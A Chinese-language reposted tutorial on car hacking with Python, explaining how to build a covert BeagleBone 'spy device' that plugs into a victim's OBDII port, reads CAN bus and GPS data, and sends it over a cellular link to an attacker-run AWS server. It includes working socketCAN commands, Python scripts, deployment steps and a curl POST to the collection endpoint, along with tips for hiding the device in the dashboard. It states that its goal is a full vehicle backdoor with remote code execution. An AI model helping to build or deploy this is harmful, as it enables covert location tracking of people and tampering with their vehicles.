欢迎光临第五届中国汽车网络信息安全峰会2020!

使用Python进行汽车黑客攻击:泄露GPS和OBDII&CAN总线数据

发布日期:2020-09-21

systemino IoVSecurity 今天 

手机阅读


点击上方蓝色字体,关注我们

本文会介绍一种基于Python用于从OBDII端口发送和接收CAN消息的设备,还可以从行驶中的车辆获取实时GPS坐标。所有的CAN和GPS数据都有可能被泄漏到云中,因此可以通过Web浏览器对汽车进行远程监控。这篇文章是关于我在使用开源软件和硬件(python-can / Flask和BeagleBone®Blue)进行汽车黑客攻击方面的经验。

 https://beagleboard.org/blue

ChupaCarBrah间谍装置

我创建了一个单独的分步教程,介绍如何构建本文将使用的间谍设备 aka ChupaCarBrah。我还共享了在设备上运行的python-can客户端的所有代码;以及在AWS上运行的服务器端Flask应用程序。间谍设备的第一个版本能够跟踪车辆位置并监视CAN数据(例如,发动机RPM,空气温度,VIN等)。所有数据都通过添加到Beaglebone的蜂窝LTE调制解调器进行过滤,JSON格式用于将数据发送到AWS上的Flask应用程序。随着车辆的行驶,云中的JSON数据会实时更新,从而使你可以完全远程监控车辆,就可以在家中对汽车进行攻击了。

 https://youtu.be/7DfXmD9MddE

ChupaCarBrah上路了

作为本文的后续,我计划再发布两篇文章以扩展当前的ChupaCarBrah功能:

第2部分— ECU CAN消息:将显示如何篡改直接连接到ECU的CAN总线(因为OBDII通常仅提供诊断数据)。我将集中精力对CAN消息进行逆向,以将精心制作的命令发送到ECU。出于安全原因,奇热我计划仅分析无危害的命令,例如开锁门,打开电动窗等;

第3部分-车辆RCE:我打算扩展ChupaCarBrah应用程序,以更加用户友好的格式显示正在运行中被窃取的所有数据,例如在地图上绘制的GPS数据。具有实时数据的GUI还将显示来自已解码CAN消息的当前车辆信息(速度,RPM等)。我还计划通过POST端点扩展AWS服务,这将允许通过蜂窝网络创建反向HTTP会话,从而将CAN命令提交给车辆。

0x01 威胁建模

通常,汽车制造商采用的威胁模型是通过在CAN总线和外部网络之间建立隔离来减少车辆的攻击面。分隔可以是物理的(空气间隙)或逻辑的(CAN网关/防火墙)。当确实需要连接CAN和外部网络(例如V2V或IVI)时,网关通过仅沿一种方式转发CAN消息来提供逻辑隔离。

用ChupaCarBrah建模

采用该威胁模型的安全级别将直接取决于,对CAN总线进行物理访问的难度和利用外部连接上的漏洞进入CAN总线的难度。本文的目的是破解它,并以实用的方式展示攻击者可以物理访问车辆并安装ChupaCarbrah时可以采取的措施。间谍设备在隔离的CAN总线和互联网之间建立了桥梁,破坏了制造商的威胁模型。

但是,要使用ChupaCarBrah进行完整的测试,你仍然需要将我在此处显示的内容与其他攻击技术(例如按键欺骗)结合起来,才能进入车辆内部。因此,我认为本文暴露的安全风险较低。但是我仍然想让制造商意识到制造商考虑CAN消息加密解决方案的重要性,并提醒车主注意无法完全控制车辆的物理通道的情况(例如,代客泊车,洗车,忘记锁门等)。

 https://youtu.be/bo04J5m1si0

ChupaCarBrah安装:不到60秒

一旦进入车内,攻击者就可以快速将ChupaCarBrah连接到OBDII端口,该设备足够小,可以隐藏在仪表板中。所使用的OBDII分离器电缆将在车辆原始连接器的前面提供一个额外的OBDII母连接器。如果攻击者非常狡猾,则可以使用胶水将分离器永久固定在OBDII端口上。这将使受害者最终可以将其他OBDII设备连接到车辆,而不必希望注意到红色的ChupaCarBrah设备。

0x02 汽车黑客概述

有研究者已经很好地分析了使用CAN(控制器局域网)进行汽车黑客攻击。如果你想更好地了解汽车供应商如何使用CAN总线来控制你的引擎和其他车辆部件,我建议你看一下Craig Smith的《 THE CAR HACKER'S HANDBOOK》。

我也推荐这篇非常好的文章:Jared Reabow的《如何使用CAN总线破解和升级你的汽车》。它专门针对CAN,并提供了非常有用的提示,例如如何猜测波特率以及如何查找和接入车辆中的CAN总线。

本文结合了两位作者提出的黑客技术。然后,我通过构建一个简单的BeagleBone间谍设备进一步分析,该设备可通过蜂窝网络与移动中的汽车进行远程交互,同时通过GPS跟踪车辆的位置。

0x03 为什么选择BeagleBone Blue?

长话短说:BeagleBone Blue已经支持CAN,包括CAN收发器。

BeagleBone Blue嵌入式CAN收发器

这意味着,你的电路板不需要额外的hat。基本上,你可以使用两条连接线并将BeagleBone的CAN Hi和CAN Lo引脚分别直接连接到汽车OBDII连接器上的6和14引脚。不仅如此,BeagleBone是一台完整的单板计算机,其**映像已经预装了SocketCan。

它还具有嵌入式WiFi网卡,可让你使用CAN工具,而无需将计算机物理连接到汽车上。它将使你可以将设备“嵌入”到汽车中,并使其完全脱离计算机运行。

对于长距离连接,可以使用USB LTE调制解调器(将在下一部分中介绍)。

因此,BeagleBone Blue板是汽车黑客的一个很好的选择,特别是当其他流行的工具(例如CANtact)在几乎所有美国分销商处都**时。如果不想使用开源,可以尝试使用诸如Macchina.cc之类的商业产品(我自己还没有尝试过,但是由于它也是基于BeagleBoard的,因此我相信这里介绍的大部分内容仍然适用) 。

0x04 编译ChupaCarBrah

你所需的最少零件是BeagleBone Blue,JST / SH连接器和连接线,它们应按如下所示连接:

BeagleBone Blue JST / SH连接器,具有连接到CAN插槽的连接线

确保连接线足够长,以便可以将其正确连接到汽车的OBDII连接器。请记住,如果电线太长,则可能需要扭曲黄色和绿色(CAN Hi和Lo)以接近标准CAN电缆的性能。当然,你始终可以使用真实的CAN电缆代替连接线。

BeagleBone Blue已连接到OBDII

这将允许你启动BeagleBone,启动套接字CAN接口以发送和接收CAN消息。这就是开始入侵CAN所需的一切,但是,通过添加一些其他部件,你可以大大提高BeagleBone的能力,以创建完整的ChupaCarBrah间谍设备。我将所有分步说明放在单独的文章中来构建你的ChupaCarbrah,这样我就可以保持本文的简洁性,并专注于Python的黑客攻击。

请参阅ChupaCarBrah-Hackster.io上的BeagleBone和Python进行汽车黑客活动,以获取有关如何创建支持GPS和蜂窝网络的完整间谍设备的完整详细信息。

0x05 发送和接收CAN消息

将BeagleBone连接到OBDII后,按电源按钮启动它,然后通过SSH连接到它。我建议尽可能使用WiFi。WIFI传输信息更快,你将在蜂窝数据计划上节省一些钱。你将需要打开点火开关,以便汽车的CAN设备也能“启动”。你可能需要启动引擎,以免损坏汽车的电池。

在使用Python代码之前,请尝试使用socketCAN手动发送和接收一些消息。首先,为can0(可以为零)接口设置波特率并启用它。

 sudo ip link set can0 up type can bitrate 500000
 sudo ifconfig can0 up

大多数汽车在OBDII总线上使用500kpbs,使用candump收听can0接口上的消息

 sudo candump can0

根据你的车辆,你可能已经在总线上看到CAN消息。如果你的公交车很安静,请打开一个新终端,然后使用cansend发送一些消息:

 sudo cansend can0 7DF#0209020000000000

你应该在运行candump的终端上看到该消息及其响应。如果没有,你可能需要检查接线和/或车辆使用的波特率。你刚刚发送的CAN消息将要求车辆的VIN号,并且响应应该类似于以下截图。

用于获取车辆VIN的CAN消息

VIN编号数据显示在最后3位“ 32 43 34”中,可以将其从十六进制解码为ASCII编码为“ 2C4”:

 echo “32 43 34” | xxd -r -p

VIN数据格式如下:

VIN数据格式

如果将ASCII VIN提供给此在线NHTSA工具,则可以解析你的车辆WMI(世界制造商标识符)并检查其准确性。以我为例,“ 2C4”表示我的车是加拿大制造的道奇车。

既然你已经确认可以使用socketCAN向汽车发送和接收来自汽车的CAN消息,则可以使用Python进行编程:

 
 import can
 
 bus = can.interface.Bus(bustype='socketcan', channel='can0', bitrate=500000)
 
 service_int = int("9", 16)
 pid_int = int("2", 16)
 
 msg = can.Message(arbitration_id=0x7DF, data=[2, service_int, pid_int, 0, 0, 0, 0, 0], is_extended_id=False)
 try:
     bus.send(msg)
     response = bus.recv(timeout=2)
     print(response)
 except can.CanError:
     print("CAN error")
 finally:
     bus.shutdown()

如果要尝试其他命令,请参考此表,并提供可用的可用OBDII PID列表。确保在Python脚本中为变量“ service_int”分配“模式(十六进制)”的整数值,并为变量“ pid_int”分配“ PID(十六进制)”变量的整数值。

例如,如果要读取引擎RPM,请使用以下命令更改脚本的第5行和第6行:

 service_int = int(“1”, 16)
 pid_int = int(“0C”, 16)

你可以在此处找到有关OBDII PID的更多文档。

0x06 GPS坐标

要获取GPS数据,只需从ChupaCarBrah设备运行“ tio”命令。

 tio / dev / ttyO2 -b 4800

它会显示很多GPS NMEA信息,但是我们只是为了获取地理位置,你只会对GPRMC 信息感兴趣。

来自ChupaCarBrah的GPS数据

你可以通过复制GPRMC 信息(如地理位置解码$ GPRMC,170454.000,A,3500.87097,N,10641.14163,W,0.00,171.40,100520 ,,, A * 79),这个在线GPRMC工具,它将绘制你的在地图上的确切位置。

GPS GPRMC地理位置在地图上绘制。

你可以使用以下Python脚本检索GPS地理位置GPRMC数据:

 import time
 import serial
 
 gps_data = ""
 utf_data = ""
 ser = serial.Serial('/dev/ttyO2', 4800)
 counter = 0
 while utf_data.find("GPRMC") == -1:
     counter += 1
     try:
         ser_data = ser.readline()
         utf_data = ser_data.decode()
     except:
         utf_data = ""
     time.sleep(0.5)
     if counter > 50:
         break
 ser.close()
 if utf_data.find("GPRMC") != -1:
     utf_data = utf_data.replace('\r', '')
     utf_data = utf_data.replace('\n', '')
     gps_data = utf_data
 
 print(gps_data)

Python代码可检索GPS地理位置坐标。

0x07 连接到蜂窝网络

我将全息图数据计划与Nova HOL-NOVA-R410蜂窝调制解调器一起使用,但是与BeagleBone兼容的任何其他运营商或蜂窝调制解调器都可以正常工作,只要你能够使用蜂窝数据连接到Internet就行。

Hologram的优点是,它们提供了Python SDK。使用数据计划激活SIM卡并安装SDK之后,即可使用此Python脚本。它允许你通过手机以编程方式连接到Internet,并ping Google以检查连接性。

 import psutil
 import time
 import subprocess
 from Hologram.CustomCloud import CustomCloud
 
 
 def hologram_network_connect():
     hologram_network_disconnect()
     time.sleep(2)
     cloud = CustomCloud(None, network='cellular')
     cloud.network.disable_at_sockets_mode()
     res = cloud.network.connect()
     message = ""
     if res:
         message = "PPP session started"
     else:
         message = "Failed to start PPP"
 
     print(message)
 
 
 def hologram_network_disconnect():
     print('Checking for existing PPP sessions')
     for proc in psutil.process_iter():
 
         try:
             pinfo = proc.as_dict(attrs=['pid', 'name'])
         except:
             print("Failed to check for existing PPP sessions")
 
         if 'pppd' in pinfo['name']:
             print('Found existing PPP session on pid: %s' % pinfo['pid'])
             print('Killing pid %s now' % pinfo['pid'])
             process = psutil.Process(pinfo['pid'])
             process.terminate()
             process.wait()
 
 
 hologram_network_connect()
 time.sleep(2)
 
 ping_response = subprocess.Popen(["/bin/ping", "-c1", "-w100", "www.google.com"], stdout=subprocess.PIPE).stdout.read()
 print(ping_response.decode())
 
 time.sleep(2)
 hologram_network_disconnect()

Python代码将Hologram蜂窝模式连接到Internet。

请参阅Hackster.io上的ChupaCarBrah教程,以获取有关如何安装全息图调制解调器及其SDK的完整详细信息。

0x08 提取数据

首先,你将需要服务器将数据发送到。使用Github上可用的Python chupacarbrah_server.py代码,并将其作为服务部署在AWS上。

下面是执行的命令:

 ~$ git clone https://github.com/blupants/chupacarbrah_server.git
 ~$ cd chupacarbrah_server
 ~$ cp chupacarbrah_server.py application.py
 ~$ source virt/bin/activate
 (virt) ~$ pip install flask==1.0.2
 (virt) ~$ pip freeze > requirements.txt
 (virt) ~$ deactivate
 ~$ python3 -m pip install awscli
 ~$ python3 -m pip install awsebcli
 ~$ eb init -p python-3.6 flask-chupacarbrah — region us-east-2
 ~$ $ eb init
 Do you want to set up SSH for your instances? (y/n): ySelect a keypair. 1) my-keypair 2) [ Create new KeyPair ]
 ~$ eb create chupacarbrah-env
 ~$ eb open

如果你需要进一步的详细说明,请再次参考Hackster.io上的ChupaCarBrah教程。

服务运行后,记下URL,以便你可以将脚本指向BeagleBone,以在那里发送数据。你可以通过curl发布一些虚拟数据来确认服务已启动并正在运行:

 SERVER_URL= curl — header “Content-Type: application/json” \
 — request POST \
 — data ‘{“car_uuid”:”51f317ec266e4adb956212201f87ba52", “VIN”: “2C4”, “maker”: “Generic”, “log”:{“timestamp”:”20200501120000",”GPS”:”00"}}’ \
 “$SERVER_URL/api/v1/cars”
 curl “$SERVER_URL/api/v1/status”

在AWS上从ChupaCarBrah服务发布和获取虚拟数据

确认AWS服务正常运行后,用SSH到BeagleBone并从Github克隆chupacarbrah。编辑chupacarbrah.py脚本,并使用上一步中的AWS服务URL 设置server_url变量。

 git clone  cd chupacarbrah
 sudo python3 chupacarbrah.py

运行后,ChupaCarBrah客户端将使用simple.csv上启用的所有CAN命令,并将它们发送到CAN总线。响应将显示在标准输出上,并发送到/ tmp / chupacarbrah / log文件。每隔1分钟,它还会作为JSON发送到AWS服务。

要停止它,请打开一个新终端(ssh会话)并运行:

 sudo touch /tmp/stop

为了启用/禁用更多OBDII PID命令,你可以通过在“启用”列上将要启用的所有命令设置为1,将要禁用的命令设置为0,来编辑文件obd2_std_PIDs_enabled.csv。在启用其他命令之前,请确保你了解这些命令的功能,并知道自己在做什么。你刚刚克隆到BeagleBone的chupacarbrah github存储库上都提供了simple.csv和obd2_std_PIDs_enabled.csv文件。

打开网络浏览器,并监视每分钟更新的JSON数据以及车辆的所有泄漏信息。

来自AWS上ChupaCarBrah服务的样本JSON虚拟数据

你可能需要刷新浏览器上的页面以更新显示的数据。由于它使用JSON格式,因此非常便于创建前端来使用它和/或将其与其他应用程序集成。

至此,本系列的第一部分已经完成,一共是3篇文章。请继续关注下一部分,我将介绍ECU CAN消息并为ChupaCarBrah添加更多功能。最终目标是在车辆中创建一个完整的后门,并支持远程代码执行。


来源:systemino


相关文章

车载CAN总线及网关渗透测试
NXP : CAN安全性-增强任何软件方法的创新硬件解决方案 .ppt
基于CAN FD总线的车载网络安全通信
利用汽车车内CAN总线错误处理机制实现DoS攻击
汽车网络安全之——CAN安全分析方法总结(国外文献)
逆向CAN总线,打开车门 !




SELECTED EVENTS




 

长按二维码识别关注



我就知道你“在看”


  • 电话咨询
  • 15021948198
  • 021-22306692
None